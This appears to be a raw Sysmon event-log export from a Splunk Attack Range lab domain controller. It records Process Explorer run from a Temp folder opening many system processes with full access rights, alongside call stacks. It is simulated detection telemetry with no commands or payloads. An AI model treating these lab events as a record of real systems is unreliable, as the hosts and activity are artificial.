15:15:53.408{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.408{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.408{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.408{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.408{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3229-6010-C2A2-00000000A301}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.408{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3229-6010-C2A2-00000000A301}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.409{732C744F-3229-6010-C2A2-00000000A301}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 